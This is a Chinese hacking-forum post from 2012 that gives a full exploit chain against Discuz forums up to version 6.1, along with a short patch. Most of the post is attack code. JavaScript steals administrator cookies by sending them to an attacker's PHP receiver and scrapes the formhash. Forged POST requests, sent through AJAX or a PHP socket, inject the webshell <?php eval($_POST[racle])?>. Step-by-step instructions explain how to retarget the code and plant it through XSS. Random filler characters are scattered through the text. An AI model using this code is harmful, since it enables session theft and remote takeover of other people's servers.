找回密码
 立即注册
查看: 3996|回复: 0
打印 上一主题 下一主题

Discuz XSS得webshell

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 17:11:49 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
Discuz XSS得webshell- q9 W9 k7 m! w7 Q: b
By racle @tian6.com8 R" T% B& @  w" ]8 `
欢迎转帖.但请保留版权信息.) ~( K$ ~- w5 c( p; `- _/ N; y
受影响版本iscuz<=6.1.0,gbk+utf+big5
5 Y" v8 \8 `& `) @6 U4 L& Y5 b. Y/ x9 M. P
新增加完全JS利用版本,只有一个文件.ajax-racle.js.有效版本提升至DZ6.1(理论上7.0版本都可以,但是6.1以上版本都已经默认打上补丁),新增浏览器版本判断,对方浏览器为IE或FIREFOX都有效.
4 A' K1 V  M. c* M. G
2 t0 C- r2 E* Y/ _) u3 d. x* H6 F' u8 c
3天前有朋友在论坛问过,说Discuz有个非论坛创始人获得WEBSHELL的漏洞,是superhei早前发出来的一大堆DISCUZ漏洞之一.见原帖:http://bbs.tian6.com/redirect.ph ... 54794&ptid=8706
9 F1 {& c  F- N. c当时我说一会就弄出来给大家,但是实际上一接触,发现这个漏洞本身需要管理员后台权限,要广泛普遍的利用还是很复杂的,主要是以下几个问题,所以拖到今天才基本完工.. E- C4 d) b. y% A. F1 N9 {9 R
, \8 O/ N) W+ w6 O+ N% a* x5 i
分析和写EXP的过程中,得到t0by57,Superhei的大力帮助.他们PHP和JS都不错的哦!希望大家看这篇文章时,更注意分析和明白的过程,毕竟XSS是目前WEB安全的最大头戏.各种形式:XSIO,Cross Iframe Trick,crsf等等..' S% O0 Y, u$ K
本帖补充其中一个FLASH XSS应用方法:配合Discuz得shell-Flash XSS( |9 D6 e  B. s3 j
. Y2 L( C& y* m& {

" l7 Q' o1 _  F( Z! o----------------------------------------------------------前言分隔线-----------------------------------------------------------------------------1 Q- k% v  X4 T

6 t% M. Z- r! o$ d
1 @, a6 y$ x0 W1 [problem1:漏洞页面runwizard.inc.php数据提交方式为post.需要模拟POST提交.
5 H( g& E7 v% Q" f+ J! a9 l2 |1 V6 ~" }& H- g
problem2ISCUZ论坛在数据提交的时候还验证了referer,因此还要伪造一下.php socket和js都可以伪造referer.
) {5 e, B3 k* Z/ g# w: O- _
# r7 t; H) c8 |4 Sproblem3:formhash()函数采用了用户名+密码+XXX的算法得出,程序本身没办法模拟算出来,于是又耗费了我一段时间,最终想到个傻办法,从源代码里读出来.呵呵.这里是参考了superhei的一个旧EXP想出来的./ Q% }3 b" H6 q4 ?
* o! c. z. B, Q3 E1 W1 [

5 S& y* y1 F3 e( h. }& ]4 U下面,我为大家简单说说这个漏洞的成因和补的办法.这里是有漏洞的文件代码:bbs/admin/runwizard.inc.php,里面有个函数function saverunwizardhistory() {
4 s2 G: A# D2 Z+ c) w( u
% r0 K+ O0 f! ~$ e( U6 T. w4 ?        global $runwizardfile, $runwizardhistory;* ~. M8 R8 [' K( ?- Y% a4 ], l
% C) P7 H1 M, x2 n  \! ?
        $fp = fopen($runwizardfile, 'w');
5 F0 m" _9 o' O$ w; H1 O9 G
- L& d7 ?& s! w/ ]0 t. a' {' p        fwrite($fp, serialize($runwizardhistory));& O) M. N: \3 C) f

+ T6 m1 C) ~9 n  c5 D        fclose($fp);
. s* f+ R# K8 ^  ]; i
5 \7 n+ s- W5 d, E) C- H4 B4 r; L}
. a) Y" A/ U( G2 t% J. w7 }复制代码serialize($runwizardhistory)直接就写进$fp里.runwizardhistory是什么呢?是论坛一些基本的配置信息,譬如论坛名.反应在论坛后台,位置是:discuz.com/bbs/admincp.php?action=runwizard&step=2.论坛名称,地址等三项信息都没任何过滤.该三项内容任何一项都可以直接写入一句话,提交,然后保存在缓存:bbs/forumdata/logs/runwizardlog.php里.( u$ D3 J5 l% h' a' `% V/ P
以下是修补的办法:function saverunwizardhistory() {
$ \; S1 a8 Q0 ^  [( k3 {$ _1 s5 l5 |% x+ D# m
        global $runwizardfile, $runwizardhistory;
' [' l5 m2 I& z8 Q" i! C& ^8 p* s) w4 ^3 B, m
        $fp = fopen($runwizardfile, 'w');: m9 n, J( Z: p3 M4 R* b2 J5 R$ y

; v1 Z* g, p5 Z2 z# @  p) C2 I        $s = '<?php exit;?>';
! A1 J( {9 d% A0 ]3 F
6 U. c  i0 O& H/ t! O; i% z3 A* J        $s .= serialize($runwizardhistory);
) G8 L: z7 m- J0 F6 ?& @9 P# N0 J4 I1 _' h$ S
        fwrite($fp, $s);5 h3 b1 `6 ^. R4 ?
2 q. o+ H, e# E1 C" `. t
        fclose($fp);
; R5 u: S! Q) c& |
! ?1 N7 H) E2 {. _" A, o3 n* n}7 i( _( {; |3 o: D, S# q, G
复制代码加写 '<?php exit;?>';到最前面,退出并且忽略该文件后面所有PHP代码.这么即使里面有一句话,也不能再被执行.: ~9 x) }$ i$ X& x* s9 G2 z9 B
/ [7 z9 P% P3 L% t  y+ n1 M, N

# @4 I4 @3 s0 ^9 O0 i5 W: W0 I  u5 R, `" q: j2 x; N# a" W
----------------------------------------漏洞的成因和利用方法分隔线-----------------------------------------------------------------------------$ h9 J, x" N7 x9 s$ Q  y8 I" x3 b

$ x5 I, p, p0 T; x/ I
: e4 w  d; i2 d7 D( M  x  以上是该漏洞的成因和利用方法.大家看到这里,估计也认为这是个鸡肋漏洞了吧,首先要有管理员权限,有后台权限,然后才能上WEBSHELL,实话说,有后台权限,拿SHELL的办法也并不止这一个.所以这个洞的价值,看起来就不大了.当然,这个已经被发布的nday不是我本帖要讲的重点.这里我主要是想告诉大家,将XSS,Crsf和本漏洞联合起来的办法.这样该洞价值就大很多了.
" A* N6 g2 ^& b  F
( f, y& g1 o! z, {1 \4 N. S" d我们的思路是:论坛上有个xss点,Crsf flash(的确有,Discuz! member.php xss bug,Discuz! 数据库错误信息xss bug,Discuz! flash Crsf bug,Discuz! admincp.php xss bug,Discuz![flash] xss bug),管理员点击或浏览后,就执行了我们的JS,带他到外部一个JS中,通过JS获得他的COOKIES,获得他的HASH,然后经过外部一个PHP封装SOCKET以POST的形式提交前面说的动作,如果论坛没有补上该问题(目前没几个论坛补了.当然,天阳已经补了.^^),那么就会产生bbs/forumdata/logs/runwizardlog.php这个WEBSHELL.$ u0 I; g4 _4 V+ M2 L8 u2 K& m

" [8 S4 r2 Z* N7 w; Q0 @这篇文章主要不是给大家个EXP,然后让大家拿着到处乱黑的,主要是讲方法,讲思路.因为这里学问不少." B" Q3 n- q9 H5 d9 j2 `

, s' A# ]2 i: \6 G. r4 ]) ]0 c8 u首先我们要看,怎么通过JS,获得管理员COOKIES,然后把COOKIES传递给最终提交的PHP.获得的办法相信大家都知道,但是传递的办法,譬如以图片形式传递,就非常稳定和实用.是实现AJAX本地语言到服务器语言PHP的好办法.JS部分代码:
/ y; d; \9 d" o) K
: D! {! U) I9 s+ x3 X& k. x5 S+ Bvar url="http://目标网站/admincp.php";      
7 W/ ^/ T9 b. J! q$ n1 D+ [: a5 Z
* n, }9 e7 B7 q; U" s/*获得cookies*/9 F5 ]4 F# n: n3 K, }

0 \. \# y  }+ C3 t0 Ifunction getURL(s) {. y; J" `8 T. A9 ]+ R! w

$ V1 D/ n- e" {# n9 n- H) Vvar image = new Image();
* U" M7 b8 u# s$ K% r, M& S  D9 j
3 z, z1 w# K' M& ?9 n7 h& p/ H* qimage.style.width = 0;
- K6 o& T  ~7 ?8 Y" d  f3 U. N& l$ R' V8 @$ p8 ~
image.style.height = 0;
/ Z6 X" r, [8 v6 N5 s  m% x2 U0 t7 ]
& d, c3 j" s6 P. p  ^$ limage.src = s;" p- @& E9 c3 D; U' E: {8 ]/ W
$ l# ^  Q) Y; U1 a& m
}+ S0 D; V, [. @  N! w

: R: S# {& k2 igetURL("我们做好的接收cookies的.php?x="+encodeURIComponent(document.cookie));  //这里就通过image变量传给了php
; N5 x3 ]+ ?' m& a+ ]9 I复制代码php以get方式接收过来的变量.$cookies=$_GET['x'];  E' Y; p5 R* c2 F4 I) {
复制代码同理,hash我也是这么传到PHP里.不过HASH的获得方法也是很有意思的,众所周知,discuz有formhash来保护每个授权访问的唯一性.但是你也可以发现,在论坛页面用户退出的地方,引用了这个hash.我们要做的,就是从页面的源文件里搜索出hash,筛选出来,传递给PHP即可.筛选的办法很多,你有兴趣的话,可以看看我的筛选JS代码(而且这里discuz其实还留了一手,呵呵) 6 x  E  w! g2 I# H; Z
& C- f0 s/ W( n! N' d0 i" E
- A) ]9 o. k9 T& ^' I9 o1 d7 P
获得了cookies和hash以后,我们需要结合完整数据,做一次模拟提交,大家可以看看,这个是我之前写好的AJAX提交方式:var url="http://tian6.com/raclebbs/";9 i* S6 |" L. m$ g4 H# F, y

0 Y+ R9 [+ v7 l0 @9 L, o# t' Q6 N. n3 m$ Y: F% P; m: w

2 a; z2 ~( \" S% d/*hash*/
5 ~/ Z' I6 x7 Q  @0 H
2 ~7 N! D+ K, h' I. fvar xmlHttpReq = new ActiveXObject("MSXML2.XMLHTTP.3.0");
0 D0 n. @0 y3 E. x: {" n( w
6 b$ Y. A, c# @( A9 x# xxmlHttpReq.open("GET", url+"admincp.php?action=home", false);& B7 r+ C" I+ w# f
: x4 s2 |- o3 r% H: T9 p) M
xmlHttpReq.send();
( @+ ?; J& h! W/ r5 c, r
1 L) I9 [7 p: i4 `. q& g! nvar resource = xmlHttpReq.responseText;7 `7 a. w+ \0 L" ~! l

: m  U! ]7 |- M- Z1 ^0 W9 kvar numero = resource.search(/formhash/);
4 C! x2 w$ R. a' X# c
- e6 Q6 n; y4 n6 H2 ?var formhash=encodeURIComponent(resource.substr(numero+17,8));, _% Z. b* N2 w1 M% t

9 Q( w) K2 h7 l1 L( g2 W
5 n- {2 c9 d5 j4 K7 @- c
, M1 w" B4 m( ~6 ], i2 X: mvar post="formhash="+formhash+"&anchor=&settingsnew%5Bbbname%5D=1&settingsnew%5Bsitename%5D=<%3Fphp+eval(%24_POST[racle])%3F>racle%40tian6.com&settingsnew%5Bsiteurl%5D=http%3A%2F%2Fwww.comsenz.com%2F&step2submit=%E4%B8%8B%E4%B8%80%E6%AD%A5";//构造要携带的数据
: t6 G, Y/ \1 T/ y' H% V1 i" _: F6 I& S! y  l  l% U/ U; F
xmlHttpReq.open("OST",url+"admincp.php?action=runwizard&step=3",false);//使用POST方法打开一个到服务器的连接,以异步方式通信 4 R. M* h, r! S4 I" g7 A

4 ?3 M/ O( T3 J6 yxmlHttpReq.setRequestHeader("Referer", url);1 F( e# D3 u, z

8 W: r; L, k4 X8 \xmlHttpReq.setrequestheader("Accept","image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword, */*");5 P. q8 d% @# S+ N: g9 j9 D0 W. R0 |
, b8 {/ J; |8 ~+ A
xmlHttpReq.setrequestheader("content-length",post.length);
: Y8 {2 l/ z6 c5 d, N
! I- S# j+ U8 xxmlHttpReq.setrequestheader("content-type","application/x-www-form-urlencoded");
( @2 \# Y. m- G. Y8 v% |: O5 ^$ [$ s- o1 f: |
xmlHttpReq.send(post);//发送数据
) b* ?8 {. t7 E9 H2 T复制代码这里HASH我假设正确,这样提交,也无须cookies- @$ ]8 Z/ _7 d# ^6 Q# c$ M# Y
, Q0 K9 z7 R, ^  k- a- ]4 s
再看看以PHP SOCKET形式提交.$sock = fsockopen("$url", 80, $errno, $errstr, 30);4 \  O" K: D/ |9 D0 a, l

4 s% ?. G* k- J; G) K, M0 kif (!$sock) die("$errstr ($errno)\n");
# P) w% o$ E- ?) O2 _" J3 m
. w9 r' n4 \) A0 D' `0 e2 x5 O" f$data = 'formhash='.$hash.'&anchor=&settingsnew%5Bbbname%5D=Discuz&settingsnew%5Bsitename%5D=<%3Fphp+eval(%24_POST[racle])%3F>racle%40tian6.com&settingsnew%5Bsiteurl%5D=http%3A%2F%2Fwww.comsenz.com%2F&step2submit=%E4%B8%8B%E4%B8%80%E6%AD%A5';" X7 y  Y! M; h) j  i
3 o" {% I7 H  x' g" M- M7 a
' X# Y# n! H4 y: X9 g9 l  U7 C

% x1 O8 O+ X5 k; v4 _fwrite($sock, "OST http://$url/admincp.php?action=runwizard&step=3 HTTP/1.1\r\n");
2 ^0 y! Q; }4 M0 M# z
0 {$ D7 H$ x" B8 k/ c5 Dfwrite($sock, "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword, */*\r\n");
1 N. D: Y/ P8 E. Q+ O+ i7 S, i
6 q( C1 Y1 d# f$ X' l' ]fwrite($sock, "Referer: http://$url/admincp.php?action=runwizard&step=2\r\n");
: ?6 \  J$ q1 C& j
' R. J- m9 r8 {4 u& e$ k3 X/ Sfwrite($sock, "Accept-Language: zh-cn\r\n");
, S) ~% ?8 x$ e$ r( ^% f" B  P. [7 U( p  h/ Y3 I1 j
fwrite($sock, "Content-Type: application/x-www-form-urlencoded\r\n");6 H( [. F  U% M" G2 {
2 z' i+ B) m: n7 U0 A9 T+ v3 n/ [/ {
fwrite($sock, "Accept-Encoding: gzip, deflate\r\n");
. r" w2 O, ]; t& N
; r( d1 l, V* ifwrite($sock, "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; User-agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; http://bsalsa.com) ; User-agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; http://bsalsa.com) (Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)); .NET CLR 1.1.4322; .NET CLR 2.0.50727)\r\n");& U: f. |+ c8 R7 s4 Y
/ z7 |2 O9 n1 I. L6 V- d4 j% @& z
fwrite($sock, "Host: $url\r\n");
1 r4 f+ d, d; n. F* `8 L& o5 _& S) D+ p0 ?  ]0 Q5 _. c, P
fwrite($sock, "Content-Length: ".strlen($data)."\r\n");
# j5 d6 u* Q; v: L( h3 g) a
. O( e- F' M8 V; v% E; Ofwrite($sock, "Connection: Keep-Alive\r\n");
* G- ^7 m4 q" M6 @2 v: l$ U1 i9 R$ h) S
fwrite($sock, "Cache-Control: no-cache\r\n");
( P* i9 K" I% a. p$ O& [3 U( d+ g
fwrite($sock, "Cookie:".$cookies."\r\n\r\n");: w9 R; w0 E8 j0 h% Q: P* r1 _& f

) L2 o- i( f' ?/ m3 Sfwrite($sock, $data);. Z! x0 u* @% b5 d  X7 |0 R" Q0 T( c
# N4 ?0 d0 d; |! o
. f) `; j2 G) L. F* M- S

% Q: {0 {4 V; r7 L5 u" ~+ J$headers = "";, p3 K6 s7 f. |$ s. R% r

- n, d) s+ G0 M+ T/ a" P# @; _while ($str = trim(fgets($sock, 4096)))
1 H: v( z5 G: ~1 a
( q! T' v9 ^/ I4 C% D+ T+ l4 G     $headers .= "$str\n";0 j% @) n7 ]3 P- I- A

- H$ V1 i3 J% Kecho "\n";
% p5 Y" k3 m; V: x2 }" A( q, b1 l" @9 m. _4 A0 W
$body = "";
5 o) ]# {5 h8 _% c. B, k) k, u: n
while (!feof($sock))
( L, z$ L+ H1 N% b
' R! T1 o! O2 q     $body .= fgets($sock, 4096);
, K) s. J2 x) p5 j! E" ]0 {7 N6 H
/ K. f7 W, v# E5 r" Ofclose($sock);. r+ k+ o: `8 u$ O/ C5 L
+ e" J3 L) q. Z" x& Z! a4 ~
echo $body;3 ~& G. d+ F$ u4 F/ e) V' J3 K
复制代码整个漏洞XSS应用大致如此,下面附上JS文件,PHP封装好的提交文件.利用文件限制一下,已注册用户才可以下载,刚来也没关系,仔细看看前面的分析,你也差不多能写出来.^^1 Z# S  Q) N5 x2 p  c1 i, N

# e; r) G+ r8 t' N1 u5 W) d; S6 G: i2 ]# f* Y* t' l  L1 R
-------------------------------------------XSS文件分析分隔线-----------------------------------------------------------------------------* u2 R$ Y! {; N! J
! b# Z, `* U( k# E* r- z

# J4 x! m/ e- M: C; V& p1HP SOCKET利用方法首先打开racle.js
* x$ c' t( h( q8 S. q8 m1 t) k- W" Z
var url="http://tian6.com/raclebbs/admincp.php?action=home"; //改成你要XSS攻击的目标,譬如http://www.discuz.com/admincp.php?action=home+ Q% U' l7 z& @  E( q$ p+ y1 b8 k

8 [; F) p  v$ H4 k" P# {
8 k# \' Z) u( M) A- [/ d8 ]
' j& m- D* ?+ e# c' b然后打开racle@tian6.php5 y% z; I* y% S9 ?% l
) M7 ^8 x( ?$ e6 X
$url="racle@tian6.com";   //改成你要XSS攻击的目标,譬如www.discuz.com2 L6 Y9 Y. k' D0 y

+ j& J) L  [& I: y, F
2 {( J5 f" U! A1 d3 e; o+ f* D6 c
1 t9 l  p+ e: h% z' E( H如果目标论坛为6.1版本,无须再改动.如果目标为6.0或以下版本,请修改:0 Q+ y' D: K& e& i

, S# f# H# V6 j) ugetURL("racle@tian6.php?resource_hash="+encodeURIComponent(resource.substr(numero+17,8))+"&x="+encodeURIComponent(document.cookie));
4 _0 K+ L. j; r% u: o  B' ^* o( e8 u$ P7 ]6 G! @' p

5 \5 H* v5 Z- Q5 |2 _% A- B/ e# \6 ]# }( p
getURL("racle@tian6.php?resource_hash="+encodeURIComponent(resource.substr(numero+9,8))+"&x="+encodeURIComponent(document.cookie));
# U1 S3 E. S! \4 ]4 }0 a4 Z复制代码2:JS利用方法打开ajax-racle.js,修改var url="http://tian6.com/raclebbs/";为你要攻击的论坛地址.
0 _6 B  ^5 X; E. I1 M: |; [- x4 N3 r( t  H
9 @( z4 c$ N" q# H; j

$ @# N: @( r* N8 p% p( G: e0 X4 v如果目标论坛为6.1版本,无须再改动.如果目标为6.0或以下版本,请修改:- o& y0 B' X% w! }& @0 J

! Z5 J. }1 p3 f( u' b+ Nvar formhash=encodeURIComponent(resource.substr(numero+17,8));
  K$ B/ l. d; z- k: M/ Z; L8 X
- d. E$ p+ h/ F# k
* s) @( v0 C6 x% I) t. y8 b8 H2 }, L4 a# D% D) c& N8 f  v
var formhash=encodeURIComponent(resource.substr(numero+9,8));, h4 c0 r0 v4 q3 n3 r
复制代码ok.以上两种方法则其一.在攻击前,我们应该先看看论坛打上补丁没有,你可以尝试访问:http://target.com/bbs/forumdata/logs/runwizardlog.php,如果一片空白,那就没戏咯.不是空白就会有些论坛信息出现,但也不代表就肯定存在漏洞,因为可能人家补过之后没有更新过论坛信息而已.目前来说,有8成把握吧.( z4 R8 T" m' S% S* j( V  r7 u
3 \5 @: b: m& @% u4 ?" S
如果是第一种方法,就把racle.js,还有racle@tian6.php文件上传到一个可以执行PHP的地方,譬如你以前拿下的WEBSHELL里.两个文件需在同一目录下.记得该空间要支持PHP.然后在论坛以<script src=http://你放好的地方/racle.js></script>构造好XSS点.
& g3 h; X) b& \6 y- x1 f* b
0 U) B* Q' I& c如果是第二种方法,就把ajax-racle.js,上传到一个你以前拿下的WEBSHELL里,然后在论坛以<script src=http://你放好的地方/ajax-racle.js></script>构造好XSS点., `7 Z$ {3 g' |8 l: R
% a# p0 S+ @+ q0 S
不管你用什么方法,等到管理员一点该连接或者浏览一下论坛,他论坛bbs/forumdata/logs/runwizardlog.php里就多了个<?php eval($_POST[racle])?> ^^.赶紧拿控制端连上去吧.
6 R: s. N2 {. [! c2 k # Q, ~' a, Q: q4 A. X
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表